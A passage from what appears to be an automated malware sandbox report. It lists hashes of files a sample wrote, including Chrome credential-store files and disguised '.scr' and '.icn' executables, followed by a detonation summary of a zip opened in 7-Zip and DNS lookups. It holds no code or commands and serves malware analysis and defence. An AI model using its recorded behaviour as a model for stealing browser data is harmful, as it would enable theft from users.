| SHA512 | 25af0299e6d82b363318e6f55c45398bdd36ca817fd50f175d0baf5424e8ccd9d4cc77a992131226bf283408ced6c25c49a140071da338fc1c0729a0516e30c6 |
C:\Users\Admin\AppData\Local\Temp\Tmp87DB.tmp
| MD5 | 9715519c1dad16a50a4d70fc3ee04c22 |
| SHA1 | 0311b743ae30948f41106045baeff0ac9acf7c41 |
| SHA256 | fcbeb2a8e01987239ff360efd3b520413f4b5cbaaebb399611513d6f4a94f8d5 |
| SHA512 | 4d36f5082382bc3001109d96527aad2918cb8d4a772343180a5546d0d6279ef014003ccfb15dac28dbc19e361587d4b07c0d30e8882632792e0bcab8ddec6212 |
C:\Users\Admin\AppData\Local\Temp\Tmp8C04.tmp
| MD5 | 473927b687ce4e43c4a8d3c6459c0ad2 |
| SHA1 | 7431e957208dbc67a4cb3ba2f0946aad012e30df |
| SHA256 | e3a72cf89dc7450347ecbeb4744d605957e57a4593e8c1542cd0b509d7770432 |
| SHA512 | 99b5ee7c65fc53a9a1ad8289b43fc881914de4303b1e3c0c2dad22e4bcb861e5f22334f9982a4792117fc347493401c3ccc874e26f38ff5cfe132b4005948637 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | a8e650c863621c35bd1c89a67464ff7c |
| SHA1 | 5d772916421964d656bfc2659919292dbba9e493 |
| SHA256 | 6d4880d90147284905d494ac0df939fbdf13f7800a188c44fd5229e147edb157 |
| SHA512 | 654b95d6edbe35fe3bbbc641fabccbb69ba0622326a96bc755ae133c9ca819113633c247ab37e0308bdc057dd8c4fd31cd24df2b6ba04043dc85475d49dc6e0d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | d5017e92f87ae654c715e1027fa776a6 |
| SHA1 | b5e5bf55564ac0c31bfc6bd4d7f22c7e80b94c29 |
| SHA256 | 2d24d476a729519a0f362e5109d6b4cf0921d7cd42a7711a3725b905cd76ea18 |
| SHA512 | d51b10b50dd71e49d3057b074e46b99de3a3013794f6c622dfba721d5a161530319f45bef3ba6c0becc0eb1d1658a47bfe44e0b95652532ce59c1c12ab53decb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 035d7c2d714817f56ca3cf5400019568 |
| SHA1 | 5d6fb247a38dc739ef0ee751d6ff84385e1d8b64 |
| SHA256 | 781a5f314a8728cab87586523eef668e6ffda4adf5461f561649ed39d2c46734 |
| SHA512 | 807bc348c02a104bfcd3f88f87f6aaed4832cde722cb24e61e82e50040f72459bc9c54987076e7b28c1384f20387f412b038f0da55d0abbe4260c762cbdd7938 |
C:\Users\Admin\AppData\Local\Temp\TmpCA14.tmp
| MD5 | 2aef3f700511cb489d81a3253672b528 |
| SHA1 | 99312171860c7b76f22dcc54cb0af36ab6c6e2a0 |
| SHA256 | 0fc6aff81cf79e92a03f110600b10a5531e5482094675709c12a432a469452ca |
| SHA512 | 0b4d67f44796dfbf0d2ff025be1ac78336c1bdbeeb19fa1ac31366306c7908c0724026fb406aafedf2b510c9dbd29b2332f3bc79e747334774cf9d8c50f52ab2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 6f922120e0c241775417467ed2525aa5 |
| SHA1 | 8c4749a78bcaf01811bd302b8c9fb0018f7549fb |
| SHA256 | 65ef99f3df4144839ca743956389e678bcaa38c50dc07791e6fa0bba85c4a273 |
| SHA512 | 0bbe0fb7acda9e020bacf41435a0576787155757824f170540d5bcb15bccdeedd94c0b919984b6bfadde83c7f19c1e12e370713eca8de3ad5e9f00353b6f04e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | b1b4f8b68a6f2e5494d8bda6b2de530c |
| SHA1 | 961de7db32dda4603ef8715453448906bfbaddba |
| SHA256 | 322af0ed4574bf538039a5ce0a8b5829e83e8c3fe568541cbcc939c796927ab8 |
| SHA512 | 95fd2aefe39d5d8b49579190cc29e7aca3431e2f3f339a852b5e244931932ea2f7bc1fc91efdc7741855d1414587a631ccc4cc797df1c8d71e11c604f7743bc1 |
C:\Users\Admin\AppData\Local\Temp\TmpE0E8.tmp
| MD5 | bad3320fc7f5a5a29f3ed6c39add2c10 |
| SHA1 | fc06cab1e1447e8e712e32528e252b4d4d7b2cc5 |
| SHA256 | afa9ca665279483580c145af38e2a1b3361344fbb9191c5a2193e64ff2c08996 |
| SHA512 | 38b43690df99d61cde36befbe11c106d62d7943dc92b04a4bcf318e8bed4527e4272f2d739802fa48668ae3cc53c338341a382681217c7422d26c24e30ca0f6e |
C:\Users\Admin\AppData\Local\TechMesh Dynamics\InnoMesh.scr
| MD5 | 18ce19b57f43ce0a5af149c96aecc685 |
| SHA1 | 1bd5ca29fc35fc8ac346f23b155337c5b28bbc36 |
| SHA256 | d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd |
| SHA512 | a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558 |
C:\Users\Admin\AppData\Local\Temp\TmpF2DC.tmp
| MD5 | cc985de01531a6a787580fa47bf130aa |
| SHA1 | 836cdde3db6d03bf430c8561826eac8a329eb6b0 |
| SHA256 | 2a2e76b25020175005e975d33e2923379ddffc83d525e3d434338b7a9b6a7e65 |
| SHA512 | f53c2b7a164ab49526e4e75939027a125d9a77f0b334b7300ee21e618971db03a373f5a52274b910317fe54456002d987fa7de4c9e722c7a89f26a50049baedf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 0e3b5062a0bb2b13b2c20a11c4051983 |
| SHA1 | d27b3d42faca3d2af69af1d84a051981b6c1d165 |
| SHA256 | 476cc3845a61221ebb74d45a37cc142a8af357e0c2ad5db419fe8fa782f45996 |
| SHA512 | 0eebe05d95fd88e7b68448bf2016f752ed8d855bcfd022a623ec5f752500c2a6ec8b04616df729b4f1dd58ff008d13e936d8dd1f231a8c7b6b77039433b43414 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 479d0f070e67a6044f7416f7b4412dcc |
| SHA1 | e2e25c829c153300b071db1050763805f9174976 |
| SHA256 | 712deb992e513870504a3e6886d6ed94989e69af36498ef0ecab2f638c612468 |
| SHA512 | 33cfd73cfd9d40f267b7a24ab91d689435958aaa95632245ff63396e2f34d0e9e541153a23886ac9a27db3f0295a94e732753147bf13b24e0daf68b9d55763ee |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 38740293266884c8ca831bb39fe8514e |
| SHA1 | bd74177888dda6f19f3100cb5dd3029096121b63 |
| SHA256 | 3824c68ce2a54a4fd99158751309d837a75708cfe68d85492d2e84043906bb9a |
| SHA512 | 51602bd5cc758927e29e776c650e0d2cd064ba27deb44e1d82c70863098bec47b53b6c3089d60f1eea12fc8ad679313d6bee94f823eb7c0fe49ab72925725465 |
C:\Users\Admin\AppData\Local\Temp\Tmp1016.tmp
| MD5 | 6c622b2c18c5263b1a83fa72995fbb3a |
| SHA1 | 042a454d2455e853b775c516406d34defc536ad9 |
| SHA256 | b378c81eb727890d7817bd601cb0e6f5e38383fde616824f0f5cde33b5cac31f |
| SHA512 | 4073034245676ff0130bb08ab4bcf5c67ad06bb3ff6f26693001f96ad9d5a96f7e3a07b51159e96fad85b7d08633b7638cc6b9c10bb6a79c61b04dc0eb2de87b |
C:\Users\Admin\AppData\Local\Temp\Tmp1A3A.tmp
| MD5 | 968200fce35f648288c2517eef217a9a |
| SHA1 | a6dd3da6887fc3c4548bb0bf09beafcea6dda3c2 |
| SHA256 | 2b63bb31296b5769a074e92f185d2a243d9b0214c3105fcb833e36a2608de54b |
| SHA512 | 48af98329a8d3ebd18a326b9d3322702f539f5ef52fded3584f990c55ffdf87a7ea4c45fbe912a156fb14f5b15751fa8d7f66faa3bdc4906e149b23f7dd34bc9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 895a2fdda50f0024ff25260f4115a610 |
| SHA1 | cd5f1e37d00d8caa0829595518102abb74108950 |
| SHA256 | f844ae90036d6cc55d0bdf5e73b2a9c049a9bdbc0a3f94c8dcf4d5841325590a |
| SHA512 | f604c2884439db3a8fb59a6d0c71a88573eb72baf889501ec4929e797feaee8fdec5a6becd4215783f6357408c3ba970c42533d396416a9516f3519da597c28a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 8403205b10f0cae55c2ca9ab5cd6c267 |
| SHA1 | d3d832620d4933b7d7f32eed62671d3a13867b5f |
| SHA256 | 30d0d82cffa0155bfac41dbaeed71469496b2af3de92b74a209c3cf79a7529b4 |
| SHA512 | 857cf9795139f61194d1db753ffc881ea36af72171776b5ff8ae890933de2004abed47e19f7b98661072b9639056d99eb70b7ae46a67365e78d67399fabb6d7d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | c4b9e79c39216a253ce6b3975a70edec |
| SHA1 | 1249a7ca93524181bd7fd15c20478a33edce668b |
| SHA256 | 99a47bdcfaba142f11e37477f4d5063aa781c8b15cf1f30d7fa6c9eaad41cad9 |
| SHA512 | a5cfffc96b342992c4f952426cdad68130f19cf8b89a625dde5580f23aac47816993639965a85d9c467e715eac38241e04e1543e5370b0d1f01e2658fbe157ae |
C:\Users\Admin\AppData\Local\Temp\Tmp4918.tmp
| MD5 | 76d90ef6fb814565698f9d54d37bf94c |
| SHA1 | 76e2cb9eb5188e96f401f4de5030be4371c6e5a0 |
| SHA256 | 7f39d6d28327e33d4b356ef266425b9a4985cfa8031757214cfb7ab2af5a3644 |
| SHA512 | d407ddcba75be5b29243c89ce520636087f68200ce937ba261810735fd61af98b78956cf1d3fb7a6a8ef8c3325aa7ba8dba43b5393d11d9e66866491524e531c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | b9f5dec63f8735652a09b7dae1ef2fc9 |
| SHA1 | 9568355eee35dc2e27889c6d93e0db42ca75c222 |
| SHA256 | ae8d8377c11d45d617e65b49e73d4c898814df02db50567ecb097ec89450a535 |
| SHA512 | 37e10406037d6b9755de228863509990776110d01c2f0a43bde4925e89b52a6e66ffe5076b3aa117616929d8491414dde4aacd80949c9e53fe7c58a644c7b906 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 04d1493c35d9d6d1d42ece9d5467197b |
| SHA1 | 18b8b179cbca8430b28e37f2dc6273f46d5242b9 |
| SHA256 | df737080b983403331733981106bcb9385eb7f0ad9907fef3c94bc5e155ef564 |
| SHA512 | 26dc8b13f6bd1e1263443a01c81f55a9fa299a008236d9989250392e06940bffaec43dfb43b98d26f4f2214e3a918a579c74260bbf4d35f35766748be87cab9f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 56ca1c169ac486cd11165f0f10503a7c |
| SHA1 | c17d72868beb9c4fc23c040f28905d45f427a90d |
| SHA256 | aa1d2fb39f828a2b4c47de7033ae106465073d6898dfa60cf069ca061369058b |
| SHA512 | 037aa3a013fb1e6e02a0b7e3b650315b23c5282f0af95df194597972e159333c223f7499b8bb6f7a196c85761d1a72a9805e061b7ef37fe59b4adf3e727040a3 |
C:\Windows\Resources\Themes\icsys.icn
| MD5 | d7dcb623cb522d25402a2e8782878d73 |
| SHA1 | b95d050300fec2c03168d07d81cd8bde5e2ff896 |
| SHA256 | ea6de8ae4370be0963b47eab8dce40d96c2d724f640f5d8335ec903187cb9c9f |
| SHA512 | 27a67e352c272a0b1d275cf17a9c62d6f13b1a2349f041551300885021ac3e2d216184c5b08ff0f9f9f782643de7816bccc3142c21e2daf688fda610a02af24e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | c6e82bb25ce0828aaf86f2b3882029c0 |
| SHA1 | 580e19cc169fd778a957b4189c461109cf2c1556 |
| SHA256 | a32842e0dc01050c33328d718d2bea3f51535ed89e1ad64196e46fbed6a06fe9 |
| SHA512 | ac7333f9d4a5e8db01e2b82f3bed15dfb79d7b490b5d42cf0fdc9d523161ef7d634817d7583d43d5d271f93e6bfbec45b3add4dd48250035583ca7e2b8f1628b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-12 18:20
Reported
2024-12-12 18:25
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
277s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Processes
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.zip"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.15.104.51.in-addr.arpa | udp |